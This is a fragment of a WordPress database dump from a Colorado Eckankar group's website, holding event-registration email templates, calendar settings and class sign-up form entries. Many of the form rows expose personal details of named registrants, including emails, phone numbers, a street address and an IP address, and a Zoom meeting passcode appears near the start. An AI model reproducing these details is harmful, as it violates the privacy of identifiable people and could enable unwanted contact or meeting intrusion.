</b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #1d5791;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b> 923 1691 4318<br />\r\n<b>Passcode:</b> 938668</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://zoom.us/j/92316914318?pwd=VHFxMFJ3T3FhcSt6eUZlejZ6bXRaUT09\">https://zoom.us/j/92316914318?pwd=VHFxMFJ3T3FhcSt6eUZlejZ6bXRaUT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:9974:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(188647,268846,'mec_event_status','EventScheduled'),(188648,268846,'mec_moved_online_link',''),(188649,268846,'mec_cancelled_reason',''),(188650,268846,'mec_display_cancellation_reason_in_single_page',''),(188651,268846,'protect_children',''),(188652,268846,'passster_activate_global_protection',NULL),(188653,268846,'passster_activate_protection',NULL),(188654,268846,'passster_protection_type','password'),(188655,268846,'boldgrid_hide_page_title','0'),(188656,268846,'_thumbnail_id','268416'),(188657,268846,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(188658,268846,'boldgrid_in_page_containers','1'),(188659,268846,'passster_area_shortcode',''),(188671,268846,'_dp_original','268425'),(188661,268846,'mec_cost_auto_calculate','0'),(188662,268846,'mec_style_per_event','global'),(188663,268846,'mec_trailer_url',''),(188664,268846,'mec_trailer_title',''),(188665,268846,'mec_start_datetime','2023-08-20 10:30 AM'),(188666,268846,'mec_end_datetime','2023-08-20 11:30 AM'),(188667,268846,'mec_sequence','5'),(188668,268846,'mec_event_gallery','a:0:{}'),(188669,268846,'mec_related_events','a:0:{}'),(188670,268846,'mec_banner','a:0:{}'),(188672,268846,'_edit_lock','1690652345:2'),(188673,268846,'_edit_last','2'),(193745,7160,'_oembed_3d2fa93b2be2fc3fe018c4a8bc757475','<iframe title=\"Discover Eckankar and Advanced Spiritual Living\" width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/s78XVcM7HWI?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen></iframe>'),(193744,269209,'_seq_num','66'),(193743,269209,'_form_id','61'),(193742,269209,'_field_649','Hey Chris Bauch, this is Chris Bauch '),(193734,269208,'_field_649',''),(193735,269208,'_form_id','61'),(193736,269208,'_seq_num','65'),(193737,269209,'_field_654','Chris'),(193738,269209,'_field_652','Bauch'),(193739,269209,'_field_653','chris.bauch.gute@gmail.com'),(193740,269209,'_field_651','(303) 366-1849'),(193741,269209,'_field_656','The ECK Satsang Discourses  Second Series - STARTS IN NOVEMBER -- 1st Tuesday at 700 pm - Zoom'),(193732,269208,'_field_651','(303) 887-3026'),(193733,269208,'_field_656','The Master 2 Discourses - STARTS IN NOVEMBER -- 2nd Wednesday at 730 pm - Zoom'),(193731,269208,'_field_653','juls.fig@hotmail.com'),(193730,269208,'_field_652','Figueroa '),(193729,269208,'_field_654','Jules'),(193728,269207,'_seq_num','25'),(193727,269207,'_form_id','17'),(193726,269207,'_field_184','a:3:{i:0;s:16:\"Colorado Springs\";i:1;s:41:\"Central Colorado - ECK Temple in Colorado\";i:2;s:8:\"Loveland\";}'),(193725,269207,'_field_183','US'),(193724,269207,'_field_182','CO'),(193723,269207,'_field_181','dogle007@yahoo.com'),(193722,269207,'_field_180','Ogletree'),(193721,269207,'_field_179','David'),(193720,269206,'_seq_num','64'),(193719,269206,'_form_id','61'),(193718,269206,'_field_649',''),(193717,269206,'_field_656','Letters of Light and Sound 1 - STARTS IN NOVEMBER -- 1st Thursday at 645 pm - Zoom'),(193716,269206,'_field_651','(304) 216-0912'),(193715,269206,'_field_653','jdelongjr@gmail.com'),(193637,269196,'_seq_num','55'),(193702,269205,'_field_496','Carla'),(193703,269205,'_field_497','Marshall'),(193704,269205,'_field_498','(504) 402-3752'),(193705,269205,'_field_499','ati2125@aol.com'),(193706,269205,'_field_500','1712 REMINGTON ST'),(193707,269205,'_field_501','Fort Collins'),(193708,269205,'_field_502','CO'),(193709,269205,'_field_503','US'),(193710,269205,'_field_505','If there is a monthly e-mail calendar of events for ECKists for Northern Colorado, please include me on the mailing list.\n\nThanks.\nMTBB,\nCarla'),(193711,269205,'_form_id','53'),(193712,269205,'_seq_num','15'),(193713,269206,'_field_654','James'),(193714,269206,'_field_652','DeLong'),(193636,269196,'_form_id','61'),(193635,269196,'_field_649',''),(193634,269196,'_field_656','The Master 4 Discourses - STARTS IN NOVEMBER -- 2nd Sunday at 845  1000 am - Temple-Hybrid'),(193633,269196,'_field_651','(303) 449-7716'),(193632,269196,'_field_653','robertsdeedee@gmail.com'),(193631,269196,'_field_652','Roberts'),(193630,269196,'_field_654','Dee Dee'),(193629,269195,'_seq_num','54'),(193407,269177,'mec_confirmed','1'),(193408,269177,'mec_event_id','269109'),(193409,269177,'mec_date','1696761000:1696764600'),(193410,269177,'mec_ticket_id',',1,'),(193411,269177,'mec_booking_time','2023-10-08 10:29:59'),(193412,269177,'mec_all_dates','a:0:{}'),(193413,269177,'mec_other_dates','a:0:{}'),(193414,269177,'mec_attention_time','1696761000:1696764600'),(193415,269177,'mec_attention_time_start','1696761000'),(193416,269177,'mec_attention_time_end','1696764600'),(193417,269177,'mec_book_date_submit','20231008102959'),(193418,269177,'mec_booking_location','129'),(193419,269177,'mec_ticket_price_1','0'),(193420,269177,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:23:\"lynnschultept@gmail.com\";s:4:\"name\";s:4:\"Lynn\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"8.44.153.169\";}}'),(193421,269177,'mec_price','0'),(193422,269177,'mec_payable','0'),(193423,269177,'mec_local_timezone','America/Denver'),(193424,269178,'_field_179','Carla'),(193425,269178,'_field_180','Marshall'),(193426,269178,'_field_181','ati2125@aol.com'),(193427,269178,'_field_182','CO'),(193428,269178,'_field_183','US'),(193429,269178,'_field_184','a:1:{i:0;s:8:\"Loveland\";}'),(193430,269178,'_form_id','17'),(193431,269178,'_seq_num','23'),(193432,269179,'_field_654','Alberto'),(193433,269179,'_field_652','Ruiz'),(193434,269179,'_field_653','switchsalon@me.com'),(193435,269179,'_field_651','(801) 971-1716'),(193436,269179,'_field_656','The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 1st Sunday at 1145 am  100 pm - Zoom'),(193437,269179,'_field_649',''),(193438,269179,'_form_id','61'),(193439,269179,'_seq_num','43'),(193440,269180,'_field_654','Jean'),(193441,269180,'_field_652','Davis'),(193442,269180,'_field_653','jean5030@gmail.com'),(193443,269180,'_field_651','(303) 324-5098'),(193444,269180,'_field_656','The Master 1 Discourses - STARTS IN NOVEMBER -- 2nd Monday at 700 pm - Zoom'),(193445,269180,'_field_649',''),(193446,269180,'_form_id','61'),(193447,269180,'_seq_num','44'),(193448,269181,'_field_654','G Dale '),(193449,269181,'_field_652','Greenawald'),(193450,269181,'_field_653','dgreenawal@aol.com'),(193451,269181,'_field_651','(720) 565-1834'),(193452,269181,'_field_656','The ECK Satsang Discourses  Second Series - STARTS IN NOVEMBER -- 1st Tuesday at 700 pm - Zoom'),(193453,269181,'_field_649','Looking forewaqrd to another extraordinary year Chris '),(193454,269181,'_form_id','61'),(193455,269181,'_seq_num','45'),(193456,269182,'_field_654','Steven'),(193457,269182,'_field_652','Tyler'),(193458,269182,'_field_653','sktyler@yahoo.com'),(193459,269182,'_field_651','(310) 953-2680'),(193460,269182,'_field_656','Soul Travel 2 - STARTS IN NOVEMBER -- 2nd Tuesday at 700 pm - Zoom'),(193461,269182,'_field_649','My wife Carolyn and I just completed Soul Travel I with Arahata, Roy Ludwick. We are looking forward to continuing with Soul Travel 2!'),(193462,269182,'_form_id','61'),(193463,269182,'_seq_num','46'),(193464,269183,'_field_654','Carolyn'),(193465,269183,'_field_652','Tyler'),(193466,269183,'_field_653','care4music2@yahoo.com'),(193467,269183,'_field_651','(650) 224-9062'),(193468,269183,'_field_656','Soul Travel 2 - STARTS IN NOVEMBER -- 2nd Tuesday at 700 pm - Zoom'),(193469,269183,'_field_649',''),(193470,269183,'_form_id','61'),(193471,269183,'_seq_num','47'),(193472,269184,'protect_children',''),(193473,269184,'mec_color',''),(193474,269184,'mec_location_id','122'),(193475,269184,'mec_dont_show_map','0'),(193476,269184,'mec_organizer_id','1'),(193477,269184,'mec_start_date','2023-10-22'),(193478,269184,'mec_start_time_hour','10'),(193479,269184,'mec_start_time_minutes','30'),(193480,269184,'mec_start_time_ampm','AM'),(193481,269184,'mec_start_day_seconds','37800'),(193482,269184,'mec_end_date','2023-10-22'),(193483,269184,'mec_end_time_hour','11'),(193484,269184,'mec_end_time_minutes','30'),(193485,269184,'mec_end_time_ampm','AM'),(193486,269184,'mec_end_day_seconds','41400'),(193487,269184,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-10-22\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-10-22\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(193488,269184,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(193489,269184,'mec_certain_weekdays','a:0:{}'),(193490,269184,'mec_allday','0'),(193491,269184,'mec_hide_time','0'),(193492,269184,'mec_hide_end_time','0'),(193493,269184,'mec_comment',''),(193494,269184,'mec_repeat_status','0'),(193495,269184,'mec_repeat_type',''),(193496,269184,'mec_repeat_interval','1'),(193497,269184,'mec_repeat_end',''),(193498,269184,'mec_repeat_end_at_occurrences','9'),(193499,269184,'mec_repeat_end_at_date',''),(193500,269184,'mec_advanced_days','a:0:{}'),(193501,269184,'mec_in_days',''),(193502,269184,'mec_not_in_days',''),(193503,269184,'mec_hourly_schedules','a:0:{}'),(193504,269184,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(193505,269184,'mec_tickets','a:0:{}'),(193506,269184,'mec_fees_global_inheritance','1'),(193507,269184,'mec_fees','a:0:{}'),(193508,269184,'mec_ticket_variations_global_inheritance','1'),(193509,269184,'mec_ticket_variations','a:0:{}'),(193510,269184,'mec_reg_fields_global_inheritance','1'),(193511,269184,'mec_reg_fields','a:0:{}'),(193512,269184,'mec_op','a:0:{}'),(193513,269184,'mec_event_date_submit','20210422105713'),(193514,269184,'mec_read_more',''),(193515,269184,'mec_more_info',''),(193516,269184,'mec_more_info_title',''),(193517,269184,'mec_more_info_target','_self'),(193518,269184,'mec_cost',''),(193519,269184,'mec_currency','a:0:{}'),(193520,269184,'mec_additional_organizer_ids','a:0:{}'),(193521,269184,'mec_additional_location_ids','a:0:{}'),(193522,269184,'one_occurrence','0'),(193523,269184,'mec_timezone','global'),(193524,269184,'mec_countdown_method','global'),(193525,269184,'mec_public','1'),(193526,269184,'mec_bfixed_fields','a:0:{}'),(193527,269184,'mec_fields','a:0:{}'),(193528,269184,'mec_event_status','EventScheduled'),(193529,269184,'mec_moved_online_link',''),(193530,269184,'mec_cancelled_reason',''),(193531,269184,'mec_display_cancellation_reason_in_single_page',''),(193532,269184,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(193533,269184,'passster_activate_global_protection',NULL),(193534,269184,'passster_activate_protection',NULL),(193535,269184,'passster_protection_type','password'),(193536,269184,'_wp_old_date','2022-01-18'),(193537,269184,'boldgrid_in_page_containers','1'),(193551,269184,'_dp_original','266827'),(193539,269184,'_oembed_feb482e9f1973a04e96ed04d346ebf98','{{unknown}}'),(193540,269184,'passster_area_shortcode',''),(193541,269184,'mec_cost_auto_calculate','0'),(193542,269184,'mec_style_per_event','global'),(193543,269184,'mec_trailer_url',''),(193544,269184,'mec_trailer_title',''),(193545,269184,'mec_start_datetime','2023-10-22 10:30 AM'),(193546,269184,'mec_end_datetime','2023-10-22 11:30 AM'),(193547,269184,'mec_sequence','9'),(193548,269184,'mec_event_gallery','a:0:{}'),(193549,269184,'mec_related_events','a:0:{}'),(193550,269184,'mec_banner','a:0:{}'),(193552,269184,'_edit_lock','1696878366:2'),(193553,269184,'_edit_last','2'),(193554,269184,'_thumbnail_id','268748'),(193555,269186,'_field_654','Marcie'),(193556,269186,'_field_652','Tucker'),(193557,269186,'_field_653','mst3334@gmail.com'),(193558,269186,'_field_651','(303) 709-3346'),(193559,269186,'_field_656','The Secret 